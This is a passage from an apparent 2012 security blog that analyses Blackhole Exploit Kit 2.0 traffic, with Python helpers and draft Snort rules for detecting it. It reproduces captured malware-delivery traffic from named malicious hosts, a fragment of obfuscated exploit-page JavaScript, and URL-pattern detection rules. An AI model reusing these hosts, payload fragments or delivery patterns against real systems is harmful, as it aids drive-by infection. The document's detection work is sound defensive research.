/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb

/detects/stones-instruction_think.php?hij=0802340202&fwi=0b0a33350a0735020405&nktu=03&wai=mpevbgmy&xsrpwq=rjbgqjpy

This is only my observations of the values in the field and could represent a fingerprint which could be used to identify different actors, different versions of the exploit kit or different setups of the exploit kit.

What are the Hex values?


The hex values consist of two separate things, randomized garbage values and numeric digits intermixed. All hex values are either 00-0b or 30-39. The 00-0b values are likely garbage, while the 30-39 values represent numbers (30-39 are the ASCII codes for the digits 0-9).

Any of us that analyzed or detected the old version of Blackhole are familiar with the old f= & e= parameters; well, I'm here to tell you it appears they still exist, only they have been morphed. The new version of Blackhole contains the same parameters, obfuscated by using garbage hexadecimal values mixed into each number, as well as random characters inserted for good measure.

Let's break down one of the URLs.
/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m

0735020b0b = 5
07 = Bell
35 = 5
02 = Start of Text
0b = Vertical tab
0b = Vertical tab

3307093738070736060b = 3786
33 = 3
07 = Bell
09 = Horizontal tab
37 = 7
38 = 8
07 = Bell
07 = Bell
36 = 6
06 = Acknowledge
0b = Vertical tab


Let's do another one.

/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v

050934030b = 4
05 = Enquiry
09 = Horizontal tab
34 = 4
03 = End of Text
0b = Vertical tab

0a050304380b37370a36 = 8776
0a = Line feed
05 = Enquiry
03 = End of Text
04 = End of Transmission
38 = 8
0b = Vertical tab
37 = 7
37 = 7
0a = Line feed
36 = 6


Both of these URLs are of dialect 2by10. You will note that the first parameter turns out to be a single digit while the second value is four digits.


Now let's go back to the fake AV infection URLs I looked at on September 15th.
hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a3302340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a3508360208&rdm=02&bnvru=dolz&gwxjfli=ewsxs


03080407333603030a3302340235073836093508033706363836353505080833 = 363458657686553


0a09380b0a3508360208 = 856

This follows a 4by64 dialect and the value of the first parameter is 363,458,657,686,553 and the second is 856.

Now Let's look at another one:
/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb

This is a 6by64 dialect where the first parameter equals 38,865,545,353 and the second parameter equals 74.
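The breakdowns above (garbage 00-0b bytes dropped, 30-39 bytes read as the digits they encode) and the dialect naming from the earlier section are mechanical enough to script. The following is an added example, not code from this post: it decodes the two hex parameters, produces the same per-byte breakdown the post does by hand, and names the dialect as <name length>by<value length> the way the post does. The sample URLs are the ones listed in this post; the control-character names are standard ASCII.

```python
"""Decode the obfuscated numeric parameters in Blackhole 2.0 binary GET requests.

Added example, not code from the post. It applies the rule the post describes:
each hex pair is one byte, 0x30-0x39 are the ASCII digits '0'-'9' that make up
the real value, and 0x00-0x0b are filler to be dropped. Dialect names
('2by10', '4by64') follow the post: <name length>by<value length>.
"""
import re
from urllib.parse import parse_qsl

# Obfuscated values contain only byte values 00-0b (filler) or 30-39 (digits).
BH_HEX_RE = re.compile(r"^(?:0[0-9a-b]|3[0-9])+$")

# ASCII names for the filler bytes, for a per-byte breakdown like the post's.
CONTROL_NAMES = {
    0x00: "Null", 0x01: "Start of Heading", 0x02: "Start of Text",
    0x03: "End of Text", 0x04: "End of Transmission", 0x05: "Enquiry",
    0x06: "Acknowledge", 0x07: "Bell", 0x08: "Backspace",
    0x09: "Horizontal tab", 0x0a: "Line feed", 0x0b: "Vertical tab",
}


def hex_pairs(value):
    """Split '0735020b0b' into ['07', '35', '02', '0b', '0b']."""
    return [value[i:i + 2] for i in range(0, len(value), 2)]


def decode_value(value):
    """Return the integer hidden in a Blackhole hex value, or None if it is not one."""
    if len(value) % 2 or not BH_HEX_RE.match(value):
        return None
    # chr(0x35) == '5': the 3x bytes are literally the ASCII digits, so keep those.
    digits = "".join(chr(int(p, 16)) for p in hex_pairs(value) if p.startswith("3"))
    return int(digits) if digits else None


def explain_value(value):
    """Per-byte breakdown as (hex pair, meaning), e.g. ('07', 'Bell'), ('35', 'digit 5')."""
    out = []
    for p in hex_pairs(value):
        byte = int(p, 16)
        if 0x30 <= byte <= 0x39:
            out.append((p, "digit " + chr(byte)))
        else:
            out.append((p, CONTROL_NAMES.get(byte, "unexpected byte")))
    return out


def classify_dialect(url):
    """Name the dialect the way the post does and decode the first two parameters."""
    query = url.split("?", 1)[1] if "?" in url else ""
    params = parse_qsl(query, keep_blank_values=True)
    if len(params) < 3:
        return None
    (n1, v1), (n2, v2), (_, v3) = params[:3]
    return {
        "dialect": "%dby%d" % (len(n1), len(v1)),
        "second_shape": "%dby%d" % (len(n2), len(v2)),
        "first_value": decode_value(v1),
        "second_value": decode_value(v2),
        # The post notes the third parameter is always a two-digit number.
        "third_two_digits": re.fullmatch(r"\d{2}", v3) is not None,
    }


# URLs from the post (paths only, as the post lists them).
SAMPLE_URLS = [
    "/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m",
    "/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v",
    "/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308"
    "&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u.split("?")[0], classify_dialect(u))
    for pair, meaning in explain_value("0735020b0b"):
        print(pair, "=", meaning)
```

Because decode_value returns None for anything that is not purely 00-0b/30-39 pairs, it doubles as a validator: a parameter that passes it is one of these obfuscated numbers, and the decoded value plus the dialect string give you the fingerprint the post suggests could distinguish actors or kit setups.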

Thanks to those who contributed their URLs to help broaden the analysis set and @Dr4g0nFlySm0k3  for discussions on the subject. #malwaremustdie.

Monday, October 22, 2012

Blackhole 2.0 Binary Get Request

Written by Frank Angiolelli, CISSP

I am still focused on Blackhole 2.0 and in my last article here, I examined the URL pattern. The regex in this previous article is good at detecting the entry points and the exploit as it is occurring, but not the binary GET request. This was because of too many false positives for sites like Facebook (credit for the teamwork to ). Today, I focused on getting the pattern for the binary GET request.

This is an ongoing series where my intel will be posted as I get it. Feedback to me on twitter @fknsec. Also, check out #malwaremustdie on twitter.


Blackhole 2.0 Entry Point/PDF/PK Pattern
     Content type/MIME type: application/pdf

\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$
  
Blackhole 2.0 Binary Get Request Pattern
 Content type/MIME Type: application/x-msdownload

\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$

     



Blackhole 2.0 - All About the PDF

Screen Cap 1:
Adobe Reader uninstalled, still prompts for PDF.
So far, I have only observed instances where a get request for the root php file is made, which contains an applet archive, the second request response is a PDF download, followed by a PK jar file, followed by the binary get request. This is so predictable that when I removed Adobe Reader from my lab, the website still requested that I download the PDF and asked me where to save it (see Screen Cap 1).

Screen Cap 2
This sample really, really wanted me to log into Bank of America.
As a side note - one of the malware samples was an impatient password stealer that actually launched IE and took me to the legitimate Bank of New York web page. (See Screen Cap 2).

Once the PDF is downloaded and executed, the system requests one or a series of PK files which java executes.

Trying to Stop the Exploit (and failing miserably)

I tried a series of moves to stop the exploit, all but one of which failed, and the other was inconclusive.

  • Disabling Javascript in Adobe Reader - failed to stop the exploit.
  • Configured "Security Enhanced" to prevent any PDF from accessing the internet - failed to stop the exploit.
  • Removed Adobe Reader - Website prompted me to save the PDF (see second screen cap)
  • Installed Foxit Reader with "Security Enhancements" enabled - failed to stop the exploit.
  • Configured DEP for all windows programs - inconclusive. I saw a binary get request and the malware downloaded and showed up in the task manager, but then it disappeared. I need more data on this before I can speak further on this.
Interestingly enough, in a majority of the cases I reviewed, the actual malware launched was install_0_msi.exe followed by a KB<random number>.exe, presumably a Pony downloader followed by Zeus-family.
Screen Cap 3:
Look at the task manager. Java and AcroRd32.exe.
The AcroRd32.exe is processor intensive when it opens.
Nothing shows on the screen to indicate that Adobe launched.

Screen Cap 4
Adobe and Foxit Readers' security settings do not stop this attack.
In my lab, disabling Java does not affect it, nor does restricting PDF access to the internet.



Characteristics of the Blackhole 2.0 Binary Get Request:

First off, check out this article posted by Rise on malwarereports.blogspot.com
Rise decodes the parameter values in the jar file to understand how blackhole passes the URL.

The Get Request:
  • The regex for the URL string is \.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$
  • The GET requests are all performed by the user agent "Java"; in these cases it was update 29.
  • The GET requests contain no Referer (but the PDF requests do).
The Response:
  • Server: nginx - Be wary this could easily be changed.
  • Content-Type: application/x-msdownload
  • Cache-Control: must-revalidate, post-check=0, pre-check=0 - (I would not rely on this one)
  • Content-Disposition: attachment; filename="<one of the names below>"
    • The file names were one of three possibilities I observed:
      • readme.exe
      • info.exe
      • about.exe
  • Content-Transfer-Encoding: binary 



URLs (Binary get request only)



/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v
/links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b&tj=k
/links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h
/forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g
/detects/signOn_go.php?ef=050934030b&me=0b350707040802093705&k=02&hz=k&kb=d
/links/calls_already_stopping.php?qf=050934030b&ue=0b36340b353507360208&p=02&kp=c&lr=p


Examples:
GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:09:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 07 Oct 2012 12:42:41 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160
Next example

GET /links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v HTTP/1.1
User-Agent: Java/1.6.0_29
Host: corandomotorider.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive 

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 20 Oct 2012 23:17:50 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 444494
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Sat, 20 Oct 2012 23:17:50 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"  
Content-Transfer-Encoding: binary 
Next example

GET /links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b&tj=k HTTP/1.1
User-Agent: Java/1.6.0_29
Host: postpozic.8x.biz
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive 

HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Sat, 20 Oct 2012 23:24:20 GMT
Content-Type: application/x-msdownload
Content-Length: 368640
Connection: keep-alive
Pragma: public
Expires: Sat, 20 Oct 2012 23:23:24 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary


Next example

GET /links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h HTTP/1.1
User-Agent: Java/1.6.0_29
Host: 94.23.43.55
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 21 Oct 2012 00:31:48 GMT
Content-Type: application/x-msdownload
Content-Length: 73326
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Pragma: public
Expires: Sun, 21 Oct 2012 00:31:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary

Next example
GET /forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g HTTP/1.1
User-Agent: Java/1.6.0_29
Host: secondhand4u.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 00:54:11 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 00:52:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040

Conclusion

In conclusion, I hope that you can use this information to combat this exploit kit. As always, I welcome suggestions, feedback and teamwork. 

Possible snort rules (I'm still testing these).


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Blackhole 2.0 Binary Get Request"; content:"GET"; offset:0; depth:3; content:"User-Agent: Java/1.6"; content:!"Referer"; pcre:"/\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$/U"; classtype:successful-user; sid:98800058;)




alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Blackhole 2.0 binary download"; content:"HTTP/1"; content:"Content-Type: application/x-msdownload"; content:"Content-Disposition: attachment|3b| filename="; distance:0; content:"Content-Transfer-Encoding: binary"; distance:0; nocase; pcre:"/filename\=\"(readme\.exe|info\.exe|about\.exe)/smi"; classtype:successful-user; sid:98800059;)
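The two rules above encode the request and response characteristics listed earlier in this post. As an added example (not the author's code), here is the same logic in Python, useful for checking a captured request/response pair offline before a rule goes onto a sensor. SAMPLE_REQUEST and SAMPLE_RESPONSE are the first example pair from this post (headers trimmed); the BENIGN_* pair is constructed so the check has something it must not flag.

```python
"""Offline check for the Blackhole 2.0 binary get request/response pair.

Added example, not code from the post. The URI regex and the header
characteristics are the ones listed in this post; the benign pair is
constructed test data.
"""
import re

# URI pattern quoted above for the binary get request
BINARY_GET_URI = re.compile(
    r"\.php\?\w\w=[a-f0-9]{10}&\w\w=[a-f0-9]{20}&\w=[0-9]{2}&\w\w=\w&\w\w=\w$"
)
# file names observed in the Content-Disposition header
DROPPED_NAMES = {"readme.exe", "info.exe", "about.exe"}

SAMPLE_REQUEST = """\
GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
"""
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: nginx/1.0.10
Content-Type: application/x-msdownload
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160
"""
# constructed benign pair: a browser request carrying a Referer, HTML back
BENIGN_REQUEST = """\
GET /index.php?id=12 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1)
Referer: http://example.invalid/
Host: example.invalid
"""
BENIGN_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html
"""


def parse_http(raw):
    """Split a raw request or response head into (start line, header map).

    Header names are lower-cased and repeated headers keep every value,
    which matters here because Cache-Control appears twice.
    """
    head = re.split(r"\r?\n\r?\n", raw.strip(), maxsplit=1)[0]
    lines = [line.rstrip("\r") for line in head.splitlines()]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def request_indicators(raw_request):
    """Request-side characteristics that match, in fixed order."""
    start, headers = parse_http(raw_request)
    parts = start.split()
    hits = []
    if len(parts) >= 2 and parts[0] == "GET" and BINARY_GET_URI.search(parts[1]):
        hits.append("uri-regex")
    if any(v.startswith("Java/") for v in headers.get("user-agent", [])):
        hits.append("java-user-agent")
    if "referer" not in headers:
        hits.append("no-referer")
    return hits


def response_indicators(raw_response):
    """Response-side characteristics that match, in fixed order."""
    _, headers = parse_http(raw_response)
    hits = []
    if "application/x-msdownload" in headers.get("content-type", []):
        hits.append("x-msdownload")
    for disposition in headers.get("content-disposition", []):
        m = re.match(r'attachment;\s*filename="?([^";]+)"?', disposition, re.I)
        if m and m.group(1).lower() in DROPPED_NAMES:
            hits.append("dropped-filename:" + m.group(1).lower())
    if "binary" in [v.lower() for v in headers.get("content-transfer-encoding", [])]:
        hits.append("binary-transfer-encoding")
    return hits


def is_blackhole_binary_get(raw_request, raw_response):
    """True when all three request-side characteristics are present and the
    response is an x-msdownload attachment with one of the observed names."""
    req = set(request_indicators(raw_request))
    resp = response_indicators(raw_response)
    return ({"uri-regex", "java-user-agent", "no-referer"} <= req
            and "x-msdownload" in resp
            and any(h.startswith("dropped-filename:") for h in resp))


if __name__ == "__main__":
    print(request_indicators(SAMPLE_REQUEST), response_indicators(SAMPLE_RESPONSE))
    print(is_blackhole_binary_get(SAMPLE_REQUEST, SAMPLE_RESPONSE))
    print(is_blackhole_binary_get(BENIGN_REQUEST, BENIGN_RESPONSE))
```

The file name and Server header are the weakest of these characteristics, as the post already notes, so the combined check requires the URI regex, the Java user agent and the missing Referer together rather than any one of them on its own.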



Shout out to @malwaremustdie and the #malwaremustdie team.


Sunday, October 14, 2012

Blackhole Exploit Kit v 2.0 URL Pattern Analysis

Written by: Frank Angiolelli, CISSP

UPDATE: 10/15/2012
Due to the high number of FPs from Facebook, the regex is now tighter.

Continuing my series on URL patterns in exploit kits, the one I am focused on right now is Blackhole Exploit Kit 2.0, and its URL structure follows a predictable pattern. The pattern I identified in this post appears to be BHEK 2.0. This is a running series where I am posting my intel as I go.


\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$



While some of the patterns I have investigated contain more than 10 hex characters in the first parameter (in 10-character increments), the majority of these have exactly 10. If you have observations that this is hitting false positives, please leave a comment below.

Some of the interesting patterns that I have discovered here are:

  1. The initial point of contact contains an applet archive
  2. The initial get request response has the following at offset 0 "<html><head><title></title></head><body><div dqa="asd">"
  3. The response contains a try/catch, try/catch sequence, but towards the end.
  4. The second and subsequent URLs (GET Requests) are a consistent match to the regex pattern above
  5. In all cases I have observed, the exploit sent was a PDF with 5 letters in the name (random name).
  6. The PDFs are served with "Content-Disposition: inline; filename="
  7. "/Index[5 1 7 1 9 4 23 4 50 " is a good layer 7 IOC in the response packets for the PDF exploit.
  8. I have observed two different sized PDFs, not sure of differences at this time.

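As an added example (not code from the post), the following Python turns the response-side indicators in the list above into checks against the landing page body and the PDF stage response. The sample body and headers are reconstructed from the capture shown below in this post and truncated (the long applet param value is replaced by a placeholder), so treat them as constructed test data rather than the full capture.

```python
"""Response-side indicator checks for the BHEK 2.0 landing page and PDF stage.

Added example, not code from the post; sample data is reconstructed from the
capture in this post and truncated.
"""
import re

# indicator 2: bytes expected at offset 0 of the initial GET response
LANDING_OFFSET0 = '<html><head><title></title></head><body><div dqa="asd">'
# indicator 1: the applet archive URL embedded in the landing page
APPLET_ARCHIVE = re.compile(r'<applet\s+archive="([^"]+)"', re.I)
# indicator 3: try/catch pairs in the obfuscated script
TRY_CATCH = re.compile(r"try\{.*?\}catch\(", re.S)
# indicators 5 and 6: inline PDF with a five-character random name
INLINE_PDF = re.compile(r'inline;\s*filename="?(\w{5}\.pdf)"?', re.I)
# indicator 7: cross-reference stream dictionary seen in the exploit PDF
PDF_INDEX_IOC = b"/Index[5 1 7 1 9 4 23 4 50 "

# constructed from the capture below; the param value is a placeholder
LANDING_BODY = (
    '<html><head><title></title></head><body><div dqa="asd"></div>'
    '<applet archive="http://173.246.101.197/links/rules_familiar-occurred.php'
    '?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea">'
    "<param name=\"&#00117;&#105;&#100;\" value='LONG-VALUE-OMITTED'></applet>"
    "</u><script>if(020==0x10)d=document;"
    'try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}'
    "</script></body></html>"
)
PDF_HEADERS = {"Content-Type": "application/pdf",
               "Content-Disposition": "inline; filename=2a34b.pdf"}
PDF_BODY = (b"%PDF-1.6\n%....\n52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R"
            b"/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream\n")


def landing_page_indicators(body):
    """Indicators present in the HTML body of the initial GET response."""
    m = APPLET_ARCHIVE.search(body)
    return {
        "offset0_marker": body.startswith(LANDING_OFFSET0),
        "applet_archive": m.group(1) if m else None,
        "try_catch_pairs": len(TRY_CATCH.findall(body)),
    }


def pdf_stage_indicators(headers, body):
    """Indicators present in the PDF stage response (header map, raw bytes)."""
    m = INLINE_PDF.search(headers.get("Content-Disposition", ""))
    return {
        "inline_random_name": m.group(1) if m else None,
        "pdf_magic": body.startswith(b"%PDF-"),
        "index_ioc": PDF_INDEX_IOC in body,
    }


def chain_score(landing, pdf):
    """Count the indicators that fired across both stages (maximum 6)."""
    hits = [
        landing["offset0_marker"],
        landing["applet_archive"] is not None,
        landing["try_catch_pairs"] >= 2,
        pdf["inline_random_name"] is not None,
        pdf["pdf_magic"],
        pdf["index_ioc"],
    ]
    return sum(hits)


if __name__ == "__main__":
    landing = landing_page_indicators(LANDING_BODY)
    pdf = pdf_stage_indicators(PDF_HEADERS, PDF_BODY)
    print(landing, pdf, chain_score(landing, pdf))
```

The applet archive URL extracted from the landing page is the one that should be fed into a URL-pattern check; the PDF checks are deliberately split into the header (inline, five-character name) and body (/Index dictionary) parts so that a capture with only the headers still scores.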
Request:

GET /links/rules_familiar-occurred.php HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0

509

<html><head><title></title></head><body><div dqa="asd"></div><applet archive="http://173.246.101.197/links/rules_familiar-occurred.php?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea"><param name="&#00117;&#105;&#100;" value=' < REALLY LONG VALUE>

</u><script>

if(020==0x10)d=document;
try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}
s="";
for(i=0;;i++){
  window.asd2();
  if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1d;
for(i=0;i<a.length;i+=2){
  s+=ss(p(a[sss](i,2),qa));

if(021==0x11)asd();

  </script></body></html>

0


Request:

GET /links/rules_familiar-occurred.php?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://173.246.101.197/links/rules_familiar-occurred.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:47 GMT
Content-Type: application/pdf
Connection: keep-alive
Content-Length: 13388
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Accept-Ranges: bytes
Content-Disposition: inline; filename=2a34b.pdf



%PDF-1.6
%....

52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream

x.bbb0b`b```.G0.....!...w.310Z...2....w...



References:
http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464
http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/
http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html
http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2
http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/
http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b
http://pastebin.com/iCfC5kzY (Credit to @MALWAREMUSTDIE)
http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591


Sunday, October 7, 2012

URL Patterns Emerging in New Threats.

Written by Frank Angiolelli, CISSP

I continue my analysis of exploit URLs and disk artifacts. This website was reported as a Blackhole exploit, but some aspects of the network traffic are consistent with Neosploit, including the user agent strings involved.

In this case, I grabbed the following exploit URL.
hxxp://www.i-democracy.ru/letter.htm





Once my sandbox got hit, I started to notice some patterns from all these attacks, remembering back to the FakeAV infection I looked at September 15th. Deeper inspection shows what looks like a usable pattern. 

First, in my infection the dialect of the exploit kit was very similar in pattern to the infection method of the FakeAV and matched other traffic observed. 




GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1
accept-encoding: pack200-gzip,gzip
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


Notice the difference in the User-Agent, and the initial Content-Type header, which is missing from the subsequent requests. The initial user agent string is consistent with observed Neosploit, and the binary download is consistent with Java exploits, where the user agent string is straight Java.

Exploit Kit Sends PDF Despite Other Exploits Available

What was also of interest is that this sandbox has multiple exploits available, but unlike the blackhole I analyzed on September 9th (where Media Player was exploited), this exploit kit sent a PDF file.

Next, I noticed the inline PDF attachment served by an nginx server. Also, see this URLquery report.



GET /forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://sonatanamore.ru:8080/forum/links/column.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: sonatanamore.ru:8080
Connection: Keep-Alive



HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:08:50 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 13581
Content-Disposition: inline; filename=a17ee.pdf



%PDF-1.6
%....

52 0 obj<</Length 12345/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream

Immediately followed by the binary download, made by Java (1.6.0_29).


GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m HTTP/1.1
User-Agent: Java/1.6.0_29
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive



HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 07 Oct 2012 05:09:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 07 Oct 2012 12:42:41 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 92160

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.




URL Pattern Analysis:

The most interesting point I could find in my URL analysis of the samples I saw was that they all contained "?", 2 to 10 lowercase characters, "=", followed by hexadecimal in 10-character increments, with as many as 70 characters (10, 20 and 70 to be precise). The secondary parameter in the URL is always shorter.

